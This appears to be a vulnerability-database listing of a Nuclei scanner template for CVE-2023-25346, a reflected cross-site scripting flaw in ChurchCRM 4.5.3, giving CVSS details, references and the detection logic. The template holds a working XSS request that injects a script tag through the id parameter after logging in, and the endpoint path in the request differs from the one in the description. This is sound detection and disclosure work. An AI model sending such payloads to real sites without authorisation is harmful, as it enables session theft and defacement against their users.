nuclei / ProjectDiscovery / NUCLEI:CVE-2023-25346
History: Jun 24, 2023 - 7:14 p.m.

ChurchCRM 4.5.3 - Cross-Site Scripting

2023-06-24 19:14:38
ProjectDiscovery
github.com
Tags: cve2023, churchcrm, cross-site scripting, injection, data theft

CVSS3: 6.1 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS: 0.002 Low
Percentile: 55.4%

A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.
id: CVE-2023-25346

info:
  name: ChurchCRM 4.5.3 - Cross-Site Scripting
  author: Harsh
  severity: medium
  description: |
    A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Upgrade to a patched version of ChurchCRM or apply the necessary security patches to mitigate the XSS vulnerability.
  reference:
    - https://github.com/10splayaSec/CVE-Disclosures/tree/main/ChurchCRM/CVE-2023-25346
    - https://nvd.nist.gov/vuln/detail/CVE-2023-25346
    - https://github.com/ChurchCRM/CRM
    - https://github.com/10splayaSec/CVE-Disclosures
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-25346
    cwe-id: CWE-79
    epss-score: 0.00165
    epss-percentile: 0.5311
    cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: churchcrm
    product: churchcrm
  tags: cve2023,cve,churchcrm,xss,authenticated

http:
  - raw:
      - |
        POST /session/begin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        User={{username}}&Password={{password}}
      - |
        GET /v2/person/not-found?id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "<script>alert(document.domain)</script>")'
          - 'contains(body_2, "ChurchCRM")'
        condition: and
# digest: 4a0a004730450220266625a03a385660482d100a25922e690653fdba45bf1e1a41a827fd8af8caa6022100ca808f4d98cd7c2a45723e7770bcb998dbaf4affca5206da3a7bd75d4ff13283:922c64590222798bb761d5b6d8e72950
